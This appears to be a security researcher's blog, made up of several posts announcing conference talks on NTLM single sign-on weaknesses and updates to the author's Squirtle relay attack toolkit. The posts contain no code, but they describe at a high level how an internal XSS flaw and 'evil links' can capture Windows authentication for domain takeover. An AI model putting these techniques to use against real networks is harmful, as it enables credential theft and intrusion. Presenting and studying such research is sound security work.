I've been very busy with a number of things and haven't been able to focus on fun things to share. Work work work work work! This year MacWorld did finally manage to fix their issue so no free platinum passes using the same, tired exploit! Squirtle has been put on the backburner for now and valentines day is right around the corner. Too bad I'm not Cupid... and I'm filled with hatred and rage!
Here's to hoping your 2009 is a great one. Happy Chinese New Year!
HD Moore already did some great analysis on how the MS08-068 patch affected the SMB Relay attacks within Metasploit. The answer?
You can't attack the source workstation/server if MS08-068 has been applied.
This ONLY affects Squirtle if your evil agent attempts to communicate back to the victim. It should not impact attacking their IMAP, HTTP or File/Print servers.
As always the goal of Squirtle is to permit others to extend their own tools to permit the use of authentication requests from controlled browsers and at your own time or when the right users click on your evil link!
Have fun with the latest updates and thanks to Natron for pointing me towards HD's analysis.
I just gave a talk to everyone here at DeepSec 08. Other than the weather being a bit cold and wet Vienna is awesome. Everyone seems happy to be at this conference and to share and network with each other. It's always fun giving the Squirtle talk to new audiences and see their eyes light up as they start to get why this attack matters to their environments or how they could use it on a client's penetration test.
With the conclusion of this talk I'm happy to announce that two new evil agent updates have been completed!
Tying a neat little bow to my NTLM/HTTP research I'll be presenting "One XSS to Rule The Enterprise" at ToorCon X the end of September and "NTLM SSO Weaknesses" at DeepSec in November. Both talks will show off the Squirtle Attack Toolkit. Hopefully I'll have some of the updates I didn't get into the DefCon release ready by ToorCon!
When friends ask "should I go to Defcon?" I always respond "Hey, check out ToorCon. It's in a nicer climate!" Vegas in July? Pfft, San Diego in September! One of the best conventions out there, period. Just check out the conference lineup!
Like many things with this blog, I don't prioritize it above things like hanging out with my girlfriend, going to work, sleeping, breaking my iPhone, losing all my Defcon pictures, etc.
Last weekend was Defcon 16. I had a really great time speaking to a packed house on the death of NTLM. Slides, slide video and source code to Squirtle are now available for your pleasure. I'll be doing some more work and documentation on Squirtle shortly.
A few quick changes were made to the slide deck from what was presented (and the slides on the CD are waaaaaay something different :). Mostly added NTLM Signing as a mitigation and correctly stating that JoMoKun did the Samba Pass-The-Hash modifications. Sorry!
More updates coming.
Defcon presentation times have been confirmed for a few weeks now and I've been slaving away at my slides and source code for a while now. I gave a pre-talk at work the other day and have decided to redo a lot of the slides. That's what you get when you ask for slides 38 days before the presentation. :)
Of course I'll have the full slides on-line after the conference but if you're coming to Defcon please come to my talk: Friday, August 8th at 2pm.
What exactly will I be talking about? Well, it's really difficult to describe succinctly but the best way I can say it is: An XSS inside your company == Total Domain Ownage.
Was that a scoff I just heard under your breath? Honestly, I'm not lying here. Because of the way NTLM and Windows Single Sign-On works your run-of-the-mill cross site scripting error on an internal resource can DEVASTATE your enterprise!
Stay tuned.
Posts
All Comments
